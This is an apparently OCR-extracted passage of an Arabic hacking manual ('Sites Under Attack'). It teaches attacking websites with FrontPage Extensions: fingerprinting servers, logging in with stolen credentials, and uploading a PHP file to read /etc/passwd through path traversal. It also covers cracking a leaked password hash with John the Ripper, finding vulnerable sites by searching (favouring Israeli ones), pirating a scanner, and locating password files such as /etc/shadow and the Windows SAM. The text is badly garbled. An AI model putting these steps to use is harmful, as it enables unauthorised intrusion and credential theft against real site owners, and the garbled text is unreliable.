ویتواجدبداخله عدة ملفات ما یهمنا منهاهو الملفاتالتالیة<br />

:<br />

‏-المل ف : service.pwd وفیهیتواجدالمعر ف وكلمة المرورالخاصةبالمشر ف مشفرةبمقیاس<br />

. authors<br />

. DES<br />

‏-المل ف : service.grp وفیهیتواجد المعرفین من مشرفین و<br />

: doctodep.btr وفیهیتواجد مسارات الملفاتالتيتمتحمیلها على<br />

الخادم ‏،فاذاقمت بتنزیله فتستطیعمعرفة الملفات<br />

الموجودةبالموقع .<br />

- ملفي deptodoc.btr و<br />

وفي الغالب لاتستطیعمعاینة محتویات المجلداذ یوجدفيالمجلدالرئیسيللموقع مل ف<br />

یقومبمنعالجمیع ‏(المالك والمجموعة و<br />

الزوار منمعاینة المجلد و محتویاته<br />

htaccess.<br />

.<br />

(<br />

ملاحظة ‏:ان عدم وضعأي صلاحیة على المجلدلایعني بأنهاتعتبرثغرة ولكنضع ف منالناحیة<br />

(<br />

)<br />

‏*المجلد<br />

: private_<br />

ویتواجدبداخله مل ف واحدفقطهو.‏htaccess .<br />

ما هي آلیة عم لال<br />

FrontPage Extension Server ؟<br />

@<br />

یعتمدالاتصالبینالعمیل وال<br />

. HTTP علىبروتوكولال FrontPage Extension Server<br />

فلواردنامعاینة عدادالزوار عن طریقبرنامجال FrontPageفانهیتمارسال طلب Request<br />

للخادمثم یمررهالخادمبال<br />

و الذي یمررهبالتالي ببرمجیاتالخادم مثل ، fpcount.exe و منثم یكررتمریره مرةأخر ىإلىال<br />

Extension Server وإلىالخادم و یظهر المخرجات<br />

لالعمیل ، علماًان هذهالاتصالات تتم عبر جدار نار .<br />

‏@كیفیةالاتصالب<br />

FrontPage Extension Server<br />

: FrontPage Extension Server<br />

.<br />

كما ذكرنا سابقاًانأغلب شركاتالتسكینتسعىلراحة العملاء،‏ فتجدهاتدعم خدمة ال FrontPage و<br />

ذلك لتحمیلالصفحا تللموقع علماً‏ بأنها<br />

تدعمبروتوكولال FTP وتحمیلالملفات وانشاءالمجلدات عبرالمتصفحاعتماداً‏ علىالبرمجیاتالتي<br />

تعملبناحیةالخادم<br />

والآنقم بتنفیذالتاليلمعرفةكیفیةالاتصالبال<br />

: FrontPage Extension Server<br />

<strong>١</strong>٣٢


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

ملاحظة )<br />

الشكلیة<br />

:<br />

(<br />

سأتكلم حالیاً‏ عنحزمة ال XP والتي لاتختل فأبداً‏ عنالحزمالباقیةإلافي بع ض النقاط<br />

. Office<br />

*<br />

‏*قم بتشغیلبرنامجال FrontPage و الذي یأتي مرفقاً‏ معحزمة<br />

منقائ مة<br />

‏*قمباضافة المعر ف وكلمةالمرور ‏(الأصلیة ولیستالمشفرة<br />

‏*اذاكانت ص حیحة سیظهرلك الخادم ملفاتالموقعكلها و عندهاتستطیعالتحمیل والتعدیلفيالملفات و<br />

المجلداتومعاینة الشفرةالمصدریة<br />

للملفات<br />

‏*اذالم تتمالعملیةبنجاحفهذایعني بأنالموقع لا یدعم الخدمةأوأنالمعر فأوكلمةالمرور خاطئة و<br />

یطلب منكمعاینتهافي وضعیةالقراءة و لا<br />

یظهرلك الشفرةالمصدریةالأصلیة ولاالمجلدات و الملفات التي یحویها الموقع .<br />

. (<br />

. Open Web Fileقمباختیار<br />

.<br />

‏@كیفیةمعرفة هلالموقع یدعم ال FrontPageأم لا<br />

:<br />

یوجد العدید منالطرقلمعرفةقابلیة الموقعلدعمالفرون تبیج نذكر منها<br />

:<br />

*<br />

معاینة مل ف نجاحالتثبیت<br />

:<br />

(<br />

)<br />

ملاحظة ‏:قد لاتجد مل ف vti_inf.html_ ولكن هذالایعنيأنالموقع لا یدعم الخدمة ‏،كماأنه لا<br />

یعتبرثغرة<br />

‏-قم بزیارةأي موقعتریدأنتعر ف هلالخادم الخا صبه یدعمال FrontPageأم لا .<br />

‏-قمبمعانیة مل ف ‏_‏vti_inf.htmlبواسطةالمتصفح و ذلكبارفاقه بعنوان الموقع ، مثال<br />

:<br />

http://www.Victim.<strong>com</strong>/_vti_inf.html<br />

- و عندمعاینةالصفحة ستجد جملة FrontPage Configuration Information ‏،فهذامعناه<br />

أنحزمة ال<br />

في الخادمبنجاح<br />

FrontPageقدتمتثبیتها Extension Server<br />

.<br />

ولمعرفةاصدارةالخدمةقمبالتالي<br />

. Source Code<br />

:<br />

‏-قمبالنقر بزرالفأرة الأیمن علىالصفحة ‏،ثمقمباختیار<br />

‏-قمبالب حث عن "FPVersion="Version حیث Versionتشیرللاصدار الخا صبالخدمة<br />

* عن طری ق مجلد<br />

.<br />

: vti_cnf_<br />

‏-قم بزیارةأي موقعتریدأنتعر ف هلالخادم الخا صبه یدعمال FrontPageأم لا<br />

‏-قمبمعانیةالمجلدبواسطةالمتصفح و ذلكبارفاقه بعنوانالموقع ، مثال<br />

.<br />

:<br />

http://www.Victim.<strong>com</strong>/_vti_cnf<br />

<strong>١</strong>٣٣


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

‏-قمبالنقر بزرالفأرة الأیمن علىالصفحة ‏،ثمقمباختیار<br />

‏-قمبالب حث عن الشفرةالتالیة<br />

. Source Code<br />

:<br />

vti_generator:Programe<br />

- حیث Programe یشیرلنو ع البرنامج واصدارته و سیكونفي حالتنا هو Microsoft<br />

. X والاصدارة الخاصةبههي FrontPage X<br />

‏*الكش ف عنالشفرةالمصدریةللصفحة<br />

:<br />

‏-قم بزیارةأي موقعتریدأنتعر ف هلالخادم الخا صبه یدعمال FrontPageأم لا<br />

‏-قمبالنقر بزرالفأرة الأیمن علىالصفحة ‏،ثمقمباختیار<br />

‏-قمبالب حثبینترمیزيالرأس عنالشفرةالتالیة<br />

.<br />

. Source Code<br />

:<br />

<br />

- حیث Programe یرم<br />

زلنو عالبرنامج واذاكان البرنامجهو<br />

یتبینلنا بأن الخادمالخا صبالموقع یدعم الفرون تبیج و<br />

Microsoft FrontPage X.0<br />

الاصدارةالخاصةبه هي . X<br />

* عن طریق موقع<br />

: NetCraft<br />

. NetCraft.net<br />

.<br />

‏-قم بزیارة الموقع<br />

‏-قم بكتابة عنوان الموقع مستثنیاًال //:http .<br />

‏-انتظربضعثواني<br />

- ستجدأن الموقعأعطاك بع ض المعلومات عنالملقم والخدمات الموجودةفي الموقع الذيتریدمعرفة<br />

قابلیة دعمهللبرنامج ، و منتلكالخدمات<br />

خدمة ال FrontPage و ستظهرلكبالشكل mod_frontpage/X حیث X یرمز لاصدارةال<br />

. FrontPage Extensions Server<br />

* عن طریق ال<br />

: Telnet<br />

(<br />

)<br />

ملاحظة ‏:تساعد هذه الطریقةفيمعرفة بع ضالمعلومات عن الخادم و المخرجاتهي نفس مخرجات<br />

الطریقة السابقة<br />

- منقائمة<br />

Startقمباختیار Run و اكتببالنافذة التي ستظهر<br />

‏-قمبالاتصالبالموقع عبرالمنفذ ‎٨٠‎بالشكلالتالي<br />

. Telnet<br />

:<br />

Microsoft Telnet> Open www.Victim.<strong>com</strong> 80<br />

‏-قمبارسال طلب Requestللخادم و لتكن الطریقة Method هي . Head<br />

<strong>١</strong>٣٤


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

) ملاحظة : علیكالالمام بكیفیة التعامل معبروتوكول ( HTTP<br />

.<br />

:<br />

Head www.Victim.net HTTP/1.1<br />

Host: ISP.net<br />

*/* :Accept<br />

Connection: close<br />

.<br />

‏-قمبارسالالتالي حیث http://www.Victim.net هو الموقعالض حیة و ISP.netهو البروكسي<br />

الخا صبمزودالخدمةالخا صبك<br />

‏-انتظربضعثواني<br />

- ستستلمالاجابة Response عن الطلب الذيارسلتهبللخادم Server مثلتاریخ آخرتعدیل<br />

للصفحة و نو عالملقم والخدمات المتوفرةبه<br />

و من ضمن الخدمات ستجد نفس الذي وجدناهفي الطریقة السابقة و هوأن خدمة ال<br />

FrontPage و<br />

ستظهرلكبالشكل mod_frontpage/X<br />

حیث X یرمز لاصدارة ال . FrontPage Extensions Server<br />

‏@كیفیةاستغلالهلیصبحفي صال حك<br />

:<br />

.<br />

(<br />

)<br />

اذا عثرت على موقع یدعم هذهالخدمة ولم یتم وضع صلاحیات على مجلدال ‏_‏vti_pvtقمبالتالي :<br />

ملاحظة : علیكالالمامبلغةتعمل على ناحیة الخادم وفي حالتنافهيال PHP ‏،كماأن على الموقع<br />

الض حیة دعم هذه اللغة<br />

‏*قمبالاتصالبالموقعالض حیة<br />

‏*قم بتحمیل مل ف ینتهيامتدادهب PHP و ضمنه التالي<br />

‏‏<br />

وقمناهنابرفع مل ف PHPللخادم یقوم بفتح ملف غیرمعینثم یحضر محتویاته على حسب حجمه<br />

بالبایتثمیعرضهثم یغلقالملف ، والآنكل<br />

<strong>١</strong>٣٥


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

ما علیكفعلهالآن هوالدخول على الموقع عبرالمتصفح والحاقه ب بعنوان المل فالذي حملته والمتغیر<br />

file و المل فالذيتریدمعاینةالشفرة<br />

المصدریةالخاصةبه ، مثال :<br />

www.Victim.<strong>com</strong>/uploded_file...../../etc/passwd//:http<br />

حیث uploded_file یشیر لاسمالمل فالذيقمت بتحمیله<br />

الملفات والمجلداتالموجودةفيالخادم ....<br />

، وتستطیعاضافةاوامرتسمحلكبمعاینة<br />

<strong>١</strong>٣٦


س


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

،<br />

(:<br />

!!<br />

س‎٥‎‏:أها ‏،لكني ماأعر فأستخدم هذاالبرنامج ممكنتشرحهوليأخيالعزیزالقنا صلو سمحت ؟؟<br />

ج‎٥‎‏:‏ لاتستأذن مني یاولد ‏،أنافي الخدمة ، شو ف:انتأول ماتنزل البرنامجوتفك ضغطه ‏،هیكون<br />

فیه مجلدین , run doc & ‏:الي یهمنا هو مجلد , run شو ف:‏ عشانتسهل على نفسك وبدل ماتفتح<br />

الدوسوتدخل على مجلدالبرنامج وهالمشاكل وكما نالبع ض مابیعر فیعملهالأشیاء:‏ p:<br />

ابحثفي جهازك عن <strong>com</strong>mand.<strong>com</strong> ‏:وقمبنسخه والصقهفي مجلد , runأوكى ؟؟<br />

وجیبكلمةالسر هذه tradesys:FpNTpIDWSk872 ‏:وحطهافي مل ف txtباسم passwd مثلا<br />

وضعهفي مجلد , run ولاتقم بفتح , john.exe افتح <strong>com</strong>mand.<strong>com</strong> واكتبفیهالأوامرالتالیة:‏<br />

لیب حثلك عنالكلمات السریةالتيتكون مطابقه لاسم المستخدم<br />

لیب حثلك عن الأرقامفقط<br />

لیب حثلك عن الحرو ف الصغیرة<br />

لیب حثلك عن جمیعالاحتمالات ) وأنا على طولأستخدم هذاالأمر<br />

عشانكده بتطول عملیة الفكمعي(‏ D:<br />

وبعدما ینتهيالبرنامج منفك الكلمة ستجدكلمةالسر المشفرة والمفكوكهبالمل ف هذا john.pot:<br />

،<br />

،<br />

john -single passwd.txt >><br />

john -i:Digits passwd.txt >><br />

john -i:Alpha passwd.txt >><br />

john -i:all passwd.txt >><br />

س‎٦‎‏:‏ یااا ه ‏،البرنامج طولكثیر ، متأكدأنههیفكتشفیرها ؟؟<br />

ج‎٦‎‏:أیوووووه لازم یفكتشفیرهافيالنهایة ، حتىلوأخذأسبو ع؛)‏ ‏،لأنهبیجرب جمیعالاحتمالا ت.‏<br />

وممكنتعر ف حالة البرنامجبالضغط علىأي زر منلوحة المفاتیح<br />

(:<br />

،<br />

س‎٧‎‏:الحمد الله خلا صانفك تكلمةالسر , ‏(‏Y‏)لكن ویناسم المستخدم ؟؟<br />

ج‎٧‎‏:فيكلمةالسر هذه , tradesys:FpNTpIDWSk872 ‏:هیكوناسم المس<br />

یعنيالكلمةالي بتكونقبل علامة<br />

تخدم ( tradesys :<br />

( :<br />

$:<br />

،<br />

س‎٨‎‏:قناا ا ص ممكنتقوليكی ف جبت هالثغرة منالموقع ؟؟<br />

ج‎٨‎‏:هههههههههه ،،، ولیههالوجه الخجلان؛)‏ ‏،أنابصراحة جبتهابالبح ثالعشوائي<br />

عنك موقع ممكنتعمل علیه سكان ببرنامجفح ص مثلبرنامج عمران<br />

الثغرات الموجودةبالموقع<br />

، ولكنانتلوكان<br />

‏(المفضللدي ) D: عشانتطلع<br />

(:<br />

(:<br />

س‎٩‎‏:‏ طیبأنا عندي سؤالین عالجواب اليفات ده ، هأسأل واحدالأول ‏،ایه طریقة البح ثالعشوائي<br />

هذه ؟؟<br />

ج:أحمأحم : انكتب حث عنثغرةمعینةفي محركب حث یستخدمال spiders عشانتلاقي<br />

مواقعكثیییرةفیهاالثغرة هذه ‏،في طبعا مواقعكثیرة بتستخدمالسبایدرز ‏،لكنلن أقولكلك علىأي<br />

واحدة منها ‏،الا هذا الموقع walla.co.il ‏:وطبعا هذا موقعاسرائیلي ، عشانمعظم النتائجتكون مواقع<br />

، هذهالطریقة<br />

اسرائیلیة؛)‏ .<br />

<strong>١</strong>٣٨


hi_HaCkEr & MaXhAk2000 <strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong> <strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

!!<br />

،<br />

س‎<strong>١</strong>٠‎‏:‏ ممممم ‏،كی فیعنيتب حث عنثغرة معینه ؟؟ ، مافهمتك زین<br />

ج‎<strong>١</strong>٠‎‏:أنا واالله ماأستخدم هالمواقعالاللب حث عنثغرات الفرون تبیج :$ ، یعنيانت مثلا عایزتب حث عن<br />

الثغرة التيتم ذكرها سابقا ایه ؟؟ مانتكاتب غیركلمة واحدة<br />

، هذه :) :) service.pwd :<br />

، هتكتب<br />

:)<br />

(:<br />

،<br />

س‎<strong>١</strong><strong>١</strong>‎‏:أهاااا مشكور حبیبي ‏،كنت عایزأسألككمان عنكیفیة عملبرامجالسكان على الثغرات<br />

ج‎<strong>١</strong><strong>١</strong>‎‏:البرامج هذه بتكونفیها مجموعةكبیرة منالثغراتأو ال , EXPLOITES وبتبدأتجربثغرة<br />

، وفي موقع رهیییب عشانتجیب منه ال , EXPLOITES هذا<br />

ثغرة على الموقع<br />

هو:‏<br />

، وتطلعلكالنتائج (:<br />

... http://www.ussrback.<strong>com</strong>/<br />

" شرح برنامج Shadow Scan Security لتحلیل الموقع "<br />

<strong>١</strong>٣٩


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

$$$$$$$$$$$$$$$<br />

<br />

$$$$$$$$$$$$$$$<br />

الكاتب:‏ لا<br />

د‏ ر<br />

نبذةبسیطة عن البرنامج :<br />

هذا البرنامجهو أكثر البرامجفعالیة في اكتشا ف الثغرات وأیضا المنافذ المفتوحة ف المواقع ولدیهأعمال<br />

كثیرةلكنيلن أتطرق إلالعملیة واحدةفق ط وهيشر حكیفیة اكتشا ف الثغراتفي المواقعومعرفة النطاقات<br />

المستخدمةلهذا الموقع وبالنسبةللخیارات الباقیةلنأشرحهالأنها سو فتأخذ وقت طویللكني سو ف<br />

أقسم شرحيلهذا البرنامج لأقسام عدة وسو فأبدئهابالأعظم وهوشرحلكیفیةإخراجثغرات الموقع<br />

والمنافذ الخاصةبه والمواقع المسجلبها والمزید من الوظائ ف<br />

أولا:تنزیل البرنامج وتنصیب الكراكSecurity Shadow Scan<br />

منه مافیهأبسط<br />

حمل البرنامج<br />

من هذي الوصلة<br />

http://www.safety-lab.<strong>com</strong>/SSS.exe<br />

وبعد<br />

مایكتمل التحمیل<br />

حمل الكراك<br />

منهنا<br />

http://www.e3sar.net/almodammer/ShadowSecurityScanner5.35.exe<br />

الطریقة :<br />

========================================<br />

بعدتحمیل البرنامج وتنزیله وعمل SetUpله<br />

افتح الكراك<br />

وبعد ذلك ستظهر هذه الصورة :<br />

<strong>١</strong>٤٠


hi_HaCkEr & MaXhAk2000 <strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong> <strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

+++++++++++<br />

ٍ][<strong>١</strong> ‏][اضغطلیتمتنفیذ الكراك<br />

][٢ ][ بعدإتمام عملیة الكراكاضغطهناللخروج<br />

========================================<br />

&***** ش البرنامج ر ح*****&‏<br />

)=<br />

سو فأشرحباختصار ومنیصعب علیه الفهمأرجوأنیتقدمليبالسؤال<br />

بعدتحمیل البرنامجقم بفتحه منقائمة<br />

ابدأStart<br />

واب حث عنه ضمن البرامج<br />

بعدإیجاد البرنامجقم بفتح<br />

ShadowScanSecurity<br />

لیأتيلك هذا ( =<br />

الشكل - <strong>١</strong> -<br />

أثناء الضغ ط علىScanner<br />

الشكل ٢- -<br />

<strong>١</strong>٤<strong>١</strong>


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

= ٣<br />

‎<strong>١</strong>‎‏=إ ضافة سیاسة جدیدة والمقصودبهاأیقونةأخر ى وهي الرقم ٤ ولكنتحملاسمك ‏(ولاداعيلأنتنشأ<br />

باحثأو سیاسة جدیدةلك یكفیك الموجودة (<br />

٢ ‏=إعداداتلهذا الباح ث وأیضا انا لاأنص حك بتغییر شيءأبدافي هذا الخیار<br />

حذ ف الموجه الجدید التي انت صممته والمقصود الأیقونة التيتشبهرقم ٤ ولكن منتصمیمك<br />

فبضغطكهنا سو فتحذفها<br />

٤= علیكتظلیله وهو المربع الذي یوجدبه خصائ ص الب حث عنكل شيء<br />

‎٥‎‏=لرجو عللخلف ولاأظنأنهناك رجو علأنها العملیة والإ طار الاول<br />

اضغطهاإ ذاأردت المتابعة<br />

الإ طار<br />

=٦<br />

٧ ‏=إزالة<br />

الشكل - ٣ -<br />

) (<strong>١</strong> للرجو عإلى الشكل ٢- -<br />

(٢) الذهابإلى العملیة التالیة<br />

) ٣ ‏)إلغاءإكمال العملیة<br />

الشكل - ٤ -<br />

<strong>١</strong>٤٢


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

+<strong>١</strong> ‏+إ ضافة موقعللبحثفیه<br />

+٢ ‏+إ ضافةأيبي من وإلى<br />

من ملف سواءكانیحتوي على مواقعترید البحث عنها اوآيبیات<br />

موقع وبعدتحدیده أثناء الضغ طهنا سو فینحذ ف<br />

+٥ + العودة والرجو عإلى الخل فأي ‏:الشكل -٣ -<br />

+٦ ‏+إتمام العملیة<br />

+٧ ‏+إزالة والخروج من الإ طارإلى واجه البرنامج الرئیسیةكباقي الأزرار السابقةفي الأشكال السابقة<br />

+٣ ‏+تحمیل<br />

+٤ + عندإ ضافة<br />

الشكل ٥- -<br />

أثناء ضغ ط الزر Done وفي الخطوة السابقة سو فیظهر هذا المربع الكبیر<br />

ومنهنا سو ف نبدأ البح ث عن الثغرا تأنظر الشكل لتفصیل أكثر<br />

<strong>١</strong>٤٣


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

الشكل ٦- -<br />

بعد الضغ ط على Start Scan وذلك بتظلیل الموقع والضغظ بزر الفأرة الیمین<br />

انتظرقلیلا بعد ضغطكلرقم‎<strong>١</strong>‎في الشكل -٥ -<br />

وسو ف یقوم البرنامجبالبح ثفي الموقع والمنافذ الخاصةبه<br />

مع النطاقاتكماهو<br />

موضحفي هذا الشكل<br />

...<br />

<strong>١</strong>٤٤


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

"<br />

اماكن وجود ملف الباسورد في أنظمة التشغیل<br />

"<br />

$$$$$$$$$$$<br />

الكاتب:بلاكهنتر<br />

$$$$$$$$$$$<br />

في نطملیونكس<br />

/etc/shadow<br />

في نظم صن میكروسیستیمز<br />

/etc/shadow<br />

في نظمال BSDبصفه عامه<br />

/etc/master.passwd<br />

في نظمالسیلیكون جرافیكس SGI المسمى ARIX<br />

/etc/shadow<br />

نظامايبيام المسمى AIX<br />

/etc/security/shadow<br />

))<br />

(( (( ((<br />

/etc/shadow<br />

((<br />

))<br />

نظم ویندوزبصفه عامه )) XP - NT - 2000 ((<br />

((<br />

/winnt/system32/config/sam<br />

نظم یونك سبصفه عامه<br />

وبع ض منتجاتالالفا<br />

ات شبي یو اكس - ‏((ترو یونك س 64<br />

اغلب هذهالاصداراتتعتمدتشفیر MD5 القوي<br />

المل ف المفعل بتشفیر (( LanMan<br />

))<br />

خا صبالمنفریم ونظمالریسك<br />

٦٤<br />

‏((هذاالمل ف مغلق عادةالا عندالاقلا ع من النظام ولا یسمح بفتحهاو نسخه طالماالنظامیعمل حتى ولو<br />

كانلدیك صلاحیات الادمنیستریتور<br />

المل فالاحتیاطي<br />

))<br />

((<br />

((<br />

))<br />

/winnt/repair/sam or sam._<br />

في الویندوز اكسبيالبروفیشینال واصدارات الویسلر<br />

لنتجدالویندوزفي مجلد WINNT<br />

ولكن سیكونكالویندوزالعاديWindows .<br />

سیرفر ‏-ادفانسد سیرفر<br />

((<br />

<strong>١</strong>٤٥


hi_HaCkEr & MaXhAk2000 <strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

اختراق الموقع ‏(الجزء الأول)‏ "<br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

"<br />

$$$$$$$$$$<br />

الكاتب:الكندور<br />

$$$$$$$$$$<br />

مقدمه :<br />

سأعیدتعری ف Telnet من جدید ولكنبطریقهاكثربساطه<br />

Telnetهوبرنامج یستخدمفيإنشاء وصلهبین جهازین ‏،والجهازالمتصل یستخدم عنوان الجهاز<br />

المستهدف و رقم المنفذ Port الذي سیتمالاتصال علیه ‏،والجهازالمستهد ف الخادم ‏)یشغلبرنامج آخر<br />

‏(‏Daemon‏)یستمع على هذا المنفذ و تتم عملیهالإرسال والاستقبالباستخدامأحدالبروتوكولات<br />

تشبیه من حیاتناالعملیة نفتر ضأن هناك رجلفيفرنسا المستهد ف)‏ وأنت المتصل)تریدإقامة حوار<br />

معه ‏(وصله)‏ وأنتفي مصر ‏..فلابدلك مناستخدام وسیله اتصال (Telnet) ولنفر ضأنها الهات ف<br />

الذي لابدللرجلأن یضعه علىأذنه ‏(‏Daemon‏)لكي یسمعك .. ولنفر ضأیضاأن هذا الرجل لایتحد ث<br />

العربیة ‏..إذنفلابدلك مناستخدامالفرنسیة البروتوكول المستخدم)‏ حتى تتحد ث(‏ الإرسال والاستقبال)‏<br />

بحریه<br />

مما سبق نستنتجأن Telnetهو مجرد وصله ) مثلالهات ف ( .. وانه لابدلنا منمعرفة البروتوكول<br />

المستخدمفيالاتصال حتى ننجحفيالإرسال و الاستقبال ‏.كماانه لابدلنا منأننعر فأیضاأنه لابد من<br />

برنامج Daemonیتسمع على المنفذالمرادالاتصال علیه .<br />

.<br />

)<br />

)<br />

..<br />

)<br />

)<br />

:<br />

استخدام Telnet ك FTP Client<br />

.<br />

المنفذالذي سیتمالاتصال علیهفي حالهاستخدامنابروتوكول نقلالملفات FileTransfer Protocol<br />

في الغالب سیكون .. ٢<strong>١</strong><br />

أینالصعوبةإذن ؟<br />

الصعوبةتكمنفيأننالكي نستخدم Telnetك FTPیجب Client علیناالإلمام بقدركبیر ببروتوكول<br />

..<br />

.<br />

FTP !!<br />

ولكن هذالن یمنعني من عر ض بع ض الأمثلة لإظهاركیفیة التعامل مع هذا البروتوكول<br />

بدءالاتصال<br />

‎<strong>١</strong>‎‏-قم بتشغیل Telnet و شبك على ftp.zdnet.<strong>com</strong>بالمنفذ ٢<strong>١</strong><br />

و هذا ما سیظهرلك<br />

- Code Sourcesشفرة<br />

220 l19-sj-zdnet.zdnet.<strong>com</strong> NcFTPd Server (licensed copy) ready.<br />

و السطر السابق یسمي Banner الخا صبال FTP Daemon المستخدمفي موقع zdnet وهي<br />

تختل فباختلا فالموقعالذي سیتمالتشبیك علیه . و الرقم الموجودفيالبدایة یدل على نجاح الاتصال و<br />

هو رقمثابت<br />

‎٢‎‏-الخطوةالتالیةهيالولوجباستخداماسمالمستخدم Username وكلمة السر .. Passwordبما<br />

أن zdnetتدعم المستخدم Anonymous سیتم استخدامهفيالولوجللنظامكالتالي:‏<br />

ستكتب<br />

- Code Sourcesشفرة<br />

user anonymous<br />

و سیستجیبالخادمبالتالي<br />

- Code Sourcesشفرة<br />

<strong>١</strong>٤٦


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

331 Guest login ok, send your <strong>com</strong>plete e-mail address as password.<br />

ثمتكتبأنتالتالي<br />

- Code Sourcesشفرة<br />

pass @zorro<br />

وبالطبع عندالولوجبالمستخدم Anonymousتقومبإعطاء عنوانالبریدالإلكترونيالخا صبكككلمة<br />

السر .. وإ ذالمتردإعطاءبریدكفیمكنكأنتكتبأي شئ یأخذ شكلالبرید أي یحتوي على الرمز @ (<br />

و سیستجیبالخادمبالتالي<br />

)<br />

- Code Sourcesشفرة<br />

230-You are user #552 of 2000 simultaneous users allowed.<br />

230-<br />

230 Logged in anonymously.<br />

..<br />

.<br />

.<br />

.<br />

وبالطبعتلك ا لإ ستجابهقدتختل ف من موقع لآخر ‏..إلافي الرقمفيبدایةكل سطر<br />

أنتالآنقدقمتبالولوجإلىالخادمبنجاح<br />

بعدأنتمت عملیهالولوجللنظام یجبإنشاء وصله لإرسال واستقبالالبیانا ت)قائمهبالملفاتالموجودةأو<br />

الملفات ذاتها)‏ ‏..إذن ماالذيكنا نفعله منذقلیل ؟!!‏ ماقد فعلناه منذقلیل هوإنشاء وصله لإرسال الأوامر<br />

للنظام واستقبالاستجابة النظام علىالأوامر .<br />

ولكي ننشئتلكالوصلة ‏،هناك طریقتین<br />

الأولي ‏:تنشئ هذه الطریقةالوصلةبان یرسلالزبون ‏(أن ت)‏ رقم IP الخا صبه و المنفذالمفتوح الذي<br />

یستطیع الخادماستخدامهفيإرسالالبیانات<br />

ولكنتلكالطریقة تتطلب منك فتحأحدالمنافذ على جهازك و هذا سیتطلببرنامج خا صلفتح هذاالمنفذ<br />

نستخدمتلك الطریقة<br />

الثانیة ‏:تنشئ هذه الطریقة الوصلةبان یرسلالزبونالأمر PASV<br />

.. ولذلكلن<br />

- Code Sourcesشفرة<br />

PASV<br />

و سیردالخادمبرقم IP الخا صبه والمنفذالمفتوح<br />

الاتصال علیه<br />

..<br />

مثال<br />

- Code Sourcesشفرة<br />

227 Entering Passive Mode (207,189,69,61,12,41)<br />

..<br />

‏(علىالخادمبالطبع)الذي یستطیع ال زبون ‏(أن ت)‏<br />

و الرقم الطویلالموجودبین الأقواستفسیرهكالتالي<br />

أولأربع مجموعات ‏(منالیسار)هوال IP الخا صبالخادم وفي هذهالحالة یكون .. ٢٠٧،<strong>١</strong>٨٩،٦٩،٦<strong>١</strong><br />

أما الرقمانالتالیانفیمثلان رقم المنفذ ویتم حسابهكالتالي<br />

12 × 256 + 41 = 3113<br />

ولذلكفالخطوةالتالیةالتي یجب علىالزبون اتباعها هي فتح وصله جدیده معالخادم علىالمنفذ ٣<strong>١</strong><strong>١</strong>٣<br />

‏..ولكيتقومبمثل هذاالأمریتوجب علیك فتح نافذة Telnet جدیده وتشبك على ftp.zdnet.<strong>com</strong><br />

بالمنفذ .. ٣<strong>١</strong><strong>١</strong>٣<br />

إذن عندماتریدأنترسلأحد الأوامر سترسله من النافذةالأولى و النافذةالثانیة ستظهربهاالبیانات<br />

مثال<br />

عندماترسل الأمر(‏ LISTیستخدم لعر ض محتویاتالدلیل)فيالنافذةالأولى<br />

- Code Sourcesشفرة<br />

..<br />

<strong>١</strong>٤٧


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

LIST<br />

سیستجیبالخادمبالتاليفيالنافذةالأولىأیضا<br />

- Code Sourcesشفرة<br />

125 Data connection already open; Transfer starting.<br />

و ستظهر محتویاتالدلیلفيالنافذةالثانیةثم<br />

محتویاتالدلیل<br />

سیتم غلقالاتصالفي النافذةالثانیةبمجردإتمام عر ض<br />

.<br />

و هكذاكلماأرد تأنترسلأمر عر ض محتویات دلیل ماأواستقبالأوإرسال مل ف ما ، یجبأنتبدأ بأمر<br />

.. PASVثمتنشئ اتصالا جدیدا بعد حساب رقم المنفذباتبا عالخطوات السابقة .<br />

إلى هنا وأظنأننيقدتمادیت .. ولكننيلماستطعأنامنع نفسي<br />

من مشاركتكمبهذاالموضو عالممتع<br />

‏(ممتعبالنسبةإلي)‏ .<br />

ملاحظات هامة<br />

